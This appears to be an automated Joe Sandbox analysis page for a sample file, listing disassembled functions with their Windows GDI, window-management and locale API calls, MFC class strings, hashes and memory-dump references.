Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
String ID:
API String ID: 597789953-0
Opcode ID: 24616ccb760b50caf67be8b66a28cfd41054b18f0b047203e09358baf0c37759
Instruction ID: 764ee34c6dc80eb710e1e2e7781a4023e20a2a3e3905e3e6e52c78ef2dbc55f4
Opcode Fuzzy Hash: 24616ccb760b50caf67be8b66a28cfd41054b18f0b047203e09358baf0c37759
Instruction Fuzzy Hash: 8451BF71600621BBEB246B64EC88EBF7EACFF47700F204815F542D21D2C675E984DB61

Function 005436FF Relevance: 24.2, APIs: 16, Instructions: 157windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00543706
CreateCompatibleDC.GDI32(00000000), ref: 0054373C
GetObjectW.GDI32(?,00000018,?), ref: 00543753
SelectObject.GDI32(?,?), ref: 0054377F
CreateCompatibleBitmap.GDI32(?,?,?), ref: 005437A1
SelectObject.GDI32(?,00000000), ref: 005437B4
CreateCompatibleDC.GDI32(?), ref: 005437C7
SelectObject.GDI32(?,?), ref: 005437D8
SelectObject.GDI32(?,00000000), ref: 005437E9
DeleteObject.GDI32(?), ref: 005437EE
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0054381A
GetPixel.GDI32(?,?,?), ref: 00543839
SetPixel.GDI32(?,?,?,00000000), ref: 00543880
SelectObject.GDI32(?,?), ref: 005438A4
SelectObject.GDI32(?,00000000), ref: 005438AC
DeleteObject.GDI32(?), ref: 005438B4

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
String ID:
API String ID: 3639146769-0
Opcode ID: 8f68030c8136408c88369e510db9fabd7226993361366ef95cd6567c6fd57438
Instruction ID: 516c2891fc8165f6ca1490a264af96127eb681c0344c32dfc2b89dae2ce05f15
Opcode Fuzzy Hash: 8f68030c8136408c88369e510db9fabd7226993361366ef95cd6567c6fd57438
Instruction Fuzzy Hash: 0D511371801249EFCF26EFA1CD49AEEBF72FF54314F20452AF411A21A0DB355A56EB60

Function 00563550 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 257timewindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0056356B
GetCursorPos.USER32(?), ref: 0056358A
ScreenToClient.USER32(?,?), ref: 00563597
GetParent.USER32(?), ref: 0056363A
SetTimer.USER32(?,00000002,FFFFFFFE,00000000), ref: 00563693
InvalidateRect.USER32(?,000000AB,00000001), ref: 005636A2
UpdateWindow.USER32(?), ref: 005636AB
KillTimer.USER32(00000002,00000002,00000000), ref: 005636B8
KillTimer.USER32(?,00000002), ref: 0056376E
GetParent.USER32(?), ref: 00563789
GetParent.USER32(?), ref: 005637DF
SendMessageW.USER32(?,0000011F,00000000,?), ref: 0056385B

Strings

<L`, xrefs: 005635D5, 00563619

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ParentTimer$KillWindow$ClientCursorInvalidateMessageRectScreenSendUpdate
String ID: <L`
API String ID: 2010726786-3276711095
Opcode ID: 32410a25fcca2494592dc81f77cd7559528a35aee988a274b2f72dc137e03f82
Instruction ID: acfca8476c5ebdb07b8527bee1489b4f95f34ef4a4ae6337786a36f3e7a98e69
Opcode Fuzzy Hash: 32410a25fcca2494592dc81f77cd7559528a35aee988a274b2f72dc137e03f82
Instruction Fuzzy Hash: 34919EB1A00301AFDF249FA1C888BA97FB5FF44314F14456DE9469B2A1DB35EE80DB50

Function 004D9583 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 126libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504

GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 004D95C8
_memset.LIBCMT ref: 004D95F4
_wcstoul.LIBCMT ref: 004D963C

Part of subcall function 005CF54B: wcstoxl.LIBCMT ref: 005CF55B

_wcslen.LIBCMT ref: 004D965D

Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629

GetUserDefaultUILanguage.KERNEL32 ref: 004D966D
ConvertDefaultLocale.KERNEL32(?), ref: 004D9694
ConvertDefaultLocale.KERNEL32(?), ref: 004D96A3
GetSystemDefaultUILanguage.KERNEL32 ref: 004D96AC
ConvertDefaultLocale.KERNEL32(?), ref: 004D96C8
ConvertDefaultLocale.KERNEL32(?), ref: 004D96D7

Strings

GetThreadPreferredUILanguages, xrefs: 004D95C2
KERNEL32.DLL, xrefs: 004D95A7
e, xrefs: 004D9613

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Default$ConvertLocale$Language$ActivateAddressProcSystemUser__getptd_noexit_memset_wcslen_wcstoulwcstoxl
String ID: GetThreadPreferredUILanguages$KERNEL32.DLL$e
API String ID: 1566020816-2285706205
Opcode ID: ea718e47f1c3e8ce59635c06299aec664d3fc06b898012fc25ac731f5b0d162f
Instruction ID: 1795ba76f20b5548481f507985ce8596599e008fd52ef2e678f606562d20f0eb
Opcode Fuzzy Hash: ea718e47f1c3e8ce59635c06299aec664d3fc06b898012fc25ac731f5b0d162f
Instruction Fuzzy Hash: 7341A471901229ABDB20AF65DC95BEE7BB8EB54710F0104ABE509E7240DB78DE81CF54

Function 00526A40 Relevance: 22.8, APIs: 15, Instructions: 328COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00526AC5
GetClientRect.USER32(?,?), ref: 00526AFF
GetWindowRect.USER32(?,?), ref: 00526B5A
EqualRect.USER32(?,?), ref: 00526B68
GetWindowRect.USER32(?,?), ref: 00526B8E

Part of subcall function 004E701F: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 004E7045

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$AdjustClientEqual
String ID:
API String ID: 2779716228-0
Opcode ID: de94a1c6e12ed5dd86d090745e8fb5b02015fa7b2002eaa06ead26bc6656ed2a
Instruction ID: 806ec996dbc875bda110786de8bb0e7ddc3b100f43f13ec3b62ce66f328e75e9
Opcode Fuzzy Hash: de94a1c6e12ed5dd86d090745e8fb5b02015fa7b2002eaa06ead26bc6656ed2a
Instruction Fuzzy Hash: 4AD1E271E01229EFCF01DFE9D988AAEBBB9FF48700F14411AE505EB255DB34A941DB90

Function 0051EB18 Relevance: 22.7, APIs: 15, Instructions: 232timeCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0051EB4E
InflateRect.USER32(?,00000000,00000000), ref: 0051EB7D
SetRectEmpty.USER32(?), ref: 0051EC1B
SetRectEmpty.USER32(?), ref: 0051EC24
GetSystemMetrics.USER32(00000002), ref: 0051EC45
KillTimer.USER32(?,00000002), ref: 0051ECDF
EqualRect.USER32(?,?), ref: 0051ED01
EqualRect.USER32(?,?), ref: 0051ED12
EqualRect.USER32(?,?), ref: 0051ED63
InvalidateRect.USER32(?,?,00000001), ref: 0051ED7C
InvalidateRect.USER32(?,?,00000001), ref: 0051ED84
EqualRect.USER32(?,?), ref: 0051ED98
InvalidateRect.USER32(?,?,00000001), ref: 0051EDAB
InvalidateRect.USER32(?,?,00000001), ref: 0051EDB3
UpdateWindow.USER32(?), ref: 0051EDC6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
String ID:
API String ID: 2140115980-0
Opcode ID: 16c1deece68caf24e263e306b5724c9cc191f097e7814f0684a2fb74cc1cb2b8
Instruction ID: 65a551f01aaa91e0b1058f9c3d31dd0309fd422d0d7f4605cd1dda86ecff6aea
Opcode Fuzzy Hash: 16c1deece68caf24e263e306b5724c9cc191f097e7814f0684a2fb74cc1cb2b8
Instruction Fuzzy Hash: 9F91F47190021A9FDF11DFA4C984AEE7BB5BF08300F1445B9EC06EB255DBB1A985CFA0

Function 00516102 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00516109

Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88

Part of subcall function 0059FF85: __EH_prolog3.LIBCMT ref: 0059FF8C

Strings

MFCShellList, xrefs: 005162DF
MFCFontComboBox, xrefs: 005161CC
MFCPropertyGrid, xrefs: 005162A8
MFCShellTree, xrefs: 0051630F
MFCMaskedEdit, xrefs: 0051623A
MFCLink, xrefs: 00516203
MFCMenuButton, xrefs: 00516271
MFCColorButton, xrefs: 0051615E
MFCEditBrowse, xrefs: 00516195
MFCButton, xrefs: 00516124
MFCVSListBox, xrefs: 0051633F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$_malloc
String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
API String ID: 1683881009-2110171958
Opcode ID: 3a40eb56d29e94b0ecfbaa94f735d9770e4bb1f5554b04ca4fbd4591fa3fb855
Instruction ID: fd3c3b466c8035383f6789e8f1556e4e13828ee8c23e9dd2eb6bb0e9eac76536
Opcode Fuzzy Hash: 3a40eb56d29e94b0ecfbaa94f735d9770e4bb1f5554b04ca4fbd4591fa3fb855
Instruction Fuzzy Hash: 20519120A04245DAEF18EB7998636FD6FA27F14B04F14481FF52AD72C2EF744B81865B

Function 00560446 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0056044D
GetObjectW.GDI32(00000018,00000018,TR`), ref: 00560469
_memmove.LIBCMT ref: 005604C7

Strings

, xrefs: 005604B3
TR`, xrefs: 00560460, 00560463

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Object_memmove
String ID: $TR`
API String ID: 107514201-2251896978
Opcode ID: 124271e068881f3f1c0dd698b72e7fc82415d53806fd5fadceb35b5f4afea655
Instruction ID: 56c24973c6be6ab183dc4c087647236e7d0cfa40f81a54bf2e11c0ebcae8da24
Opcode Fuzzy Hash: 124271e068881f3f1c0dd698b72e7fc82415d53806fd5fadceb35b5f4afea655
Instruction Fuzzy Hash: 3A413571C00219AFCF15EFA5DC919AEBFB5FF54304B10802AE512A72A0DB749E45DFA0

Function 0053B5C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0053B5E5
GetCapture.USER32 ref: 0053B60C
GetCapture.USER32 ref: 0053B621
GetAsyncKeyState.USER32(00000001), ref: 0053B62F
ReleaseCapture.USER32 ref: 0053B647
GetWindowRect.USER32(?,?), ref: 0053B67B
PtInRect.USER32(?,?,?), ref: 0053B694
ClientToScreen.USER32(?,?), ref: 0053B6E8
GetParent.USER32(?), ref: 0053B747
ClientToScreen.USER32(?,?), ref: 0053B7FD

Strings

c, xrefs: 0053B79D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Capture$ClientRectScreen$AsyncCursorParentReleaseStateWindow
String ID: c
API String ID: 3949579999-2927717585
Opcode ID: 9833fb3d2652116b19ecf0cb97ffefb4d43cd0a2218cc4e88784468d0da3eb90
Instruction ID: 31b00d5ce0ec4bf38fadce8fe33f2459d1b6118d4e2faf3aa4cfc8c752efe6da
Opcode Fuzzy Hash: 9833fb3d2652116b19ecf0cb97ffefb4d43cd0a2218cc4e88784468d0da3eb90
Instruction Fuzzy Hash: B1714D75A00205AFDF11DFA4C889BEE7FB5FF49300F1440AAED05AB296CB359944CB61

Function 0053A806 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0054D43D

Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2

GetWindowRect.USER32(?,?), ref: 0054D508

Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA

Part of subcall function 0054CAE8: GetWindowRect.USER32(?,?), ref: 0054CAF8

Strings

PinState, xrefs: 0054D5C9
%sPane-%d%x, xrefs: 0054D4A8
%sPane-%d, xrefs: 0054D48F
RectRecentDocked, xrefs: 0054D572
RecentFrameAlignment, xrefs: 0054D584
RecentRowIndex, xrefs: 0054D596
MRUWidth, xrefs: 0054D5B7
IsFloating, xrefs: 0054D5A5
RectRecentFloat, xrefs: 0054D55F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3RectWindow$Ctrl
String ID: %sPane-%d$%sPane-%d%x$IsFloating$MRUWidth$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
API String ID: 2598721110-1120251949
Opcode ID: 3fc23df7341ef8073dc60accf12c562d2ff4090aaa31bcbde4ba17cefa39f3d9
Instruction ID: 396356b2b95e30dfb9c67f4ca9c0954eb32e7e7e6c0754f2c95c074dae9dd41d
Opcode Fuzzy Hash: 3fc23df7341ef8073dc60accf12c562d2ff4090aaa31bcbde4ba17cefa39f3d9
Instruction Fuzzy Hash: C3516931600605EFCF15AFA4C899AFEBBB2BF48314F10451EF9169B2A1DB359910DF61

Function 00522C91 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00522CFA
MonitorFromPoint.USER32(?,?,00000002), ref: 00522D33
GetMonitorInfoW.USER32(00000000), ref: 00522D3A
CopyRect.USER32(?,?), ref: 00522D52
CopyRect.USER32(?,?), ref: 00522D5C

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00522D93
GetSystemMetrics.USER32(00000022), ref: 00522E11
GetSystemMetrics.USER32(00000023), ref: 00522E18

Strings

"9R, xrefs: 00522CA5
(, xrefs: 00522D2C
"9R, xrefs: 00522DA3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: RectSystem$CopyInfoMetricsMonitor$Exception@8FromH_prolog3ParametersPointThrowWindow
String ID: "9R$"9R$(
API String ID: 348238172-1706832302
Opcode ID: 4951e44fa0b4019207b8029bde487d0d51b31fa43d0c95622cf139d19eeba796
Instruction ID: 9330f701bb931aea55349ff1f5e6eca84c3a2a8c74997dda4f62c05a078ce93d
Opcode Fuzzy Hash: 4951e44fa0b4019207b8029bde487d0d51b31fa43d0c95622cf139d19eeba796
Instruction Fuzzy Hash: 7A512AB5E00219AFCB14DFA9D985AEEBBF9FF88300F14452AE505E7254D734AA05CF60

Function 00546E1F Relevance: 18.3, APIs: 12, Instructions: 318windowCOMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 00546E40
IsRectEmpty.USER32(?), ref: 00546E6C
IntersectRect.USER32(?,?,?), ref: 00546EEB
IntersectRect.USER32(?,?,?), ref: 00546F87
IsRectEmpty.USER32(?), ref: 00546FC5
IsRectEmpty.USER32(?), ref: 00546FD3
SelectObject.GDI32(?), ref: 00546FE9
IsRectEmpty.USER32(?), ref: 00547002
IsRectEmpty.USER32(?), ref: 0054701A
StretchBlt.GDI32(00000000,?,?,?,?,?,?,?,?,00CC0020), ref: 005470BF
SelectObject.GDI32(?), ref: 005470D0
SetRectEmpty.USER32(?), ref: 0054714B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$IntersectObjectSelect$Stretch
String ID:
API String ID: 401711590-0
Opcode ID: 804e06e325d92981169ccebc3566dc7d3e2ceb5a1eb81d38aca4caaf75fcb70b
Instruction ID: 7847327e2ca8d1eab22aad26dda97e1e3448786206208d8e17d1177856891291
Opcode Fuzzy Hash: 804e06e325d92981169ccebc3566dc7d3e2ceb5a1eb81d38aca4caaf75fcb70b
Instruction Fuzzy Hash: 8CC1B17290010AAFCF05CFA8C984AEEBBB9FF49358B155619F815E7214DB34E945CF50

Function 005461BD Relevance: 18.2, APIs: 12, Instructions: 226windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005461C4
TransparentBlt.MSIMG32(00000000,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,000000FF,00000048,00546DED,00000000,?,?), ref: 0054621C
CreateCompatibleDC.GDI32(?), ref: 00546261
CreateCompatibleDC.GDI32(?), ref: 0054627E
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0054629C
StretchBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00546300
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00CC0020), ref: 0054632E
CreateBitmap.GDI32(00000000,00000000,00000001,00000001,00000000), ref: 0054633B
BitBlt.GDI32(005080B9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 00546374
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,005080B9,00000000,00000000,008800C6), ref: 005463A2
BitBlt.GDI32(?,?,00000000,00000000,00000000,005080B9,00000000,00000000,008800C6), ref: 005463CF
BitBlt.GDI32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00EE0086), ref: 005463EA

Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99

Part of subcall function 004E0389: DeleteDC.GDI32(00000000), ref: 004E039B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Create$Compatible$Bitmap$DeleteH_prolog3H_prolog3_catch_StretchTransparent
String ID:
API String ID: 650092443-0
Opcode ID: 44fb104d723b83f7ccd9041471593eb5a89c9614246bc574810909877aef582c
Instruction ID: 2d658169b588b053a7f69f8e28830ec9784dc18ffa25cb401439ffe660c150d3
Opcode Fuzzy Hash: 44fb104d723b83f7ccd9041471593eb5a89c9614246bc574810909877aef582c
Instruction Fuzzy Hash: 6B910F71800149AFCF02EFA1CD81EEEBF76BF18348F244529F915A2161CB759E64EB61

Function 0052C992 Relevance: 18.2, APIs: 12, Instructions: 150windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0052C61A: LoadCursorW.USER32(00000000,00007F8B), ref: 0052C63B
Part of subcall function 0052C61A: LoadCursorW.USER32(?,00007901), ref: 0052C654

PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 0052C9CA
PostMessageW.USER32(?,00000111,0000E145,00000000), ref: 0052CA2D
SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 0052CA4F
GetCursorPos.USER32(?), ref: 0052CA6A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0052CA96
ReleaseCapture.USER32 ref: 0052CAE3
SetCapture.USER32(?), ref: 0052CAE8
ReleaseCapture.USER32 ref: 0052CAF4
SendMessageW.USER32(?,00000362,?,00000000), ref: 0052CB08
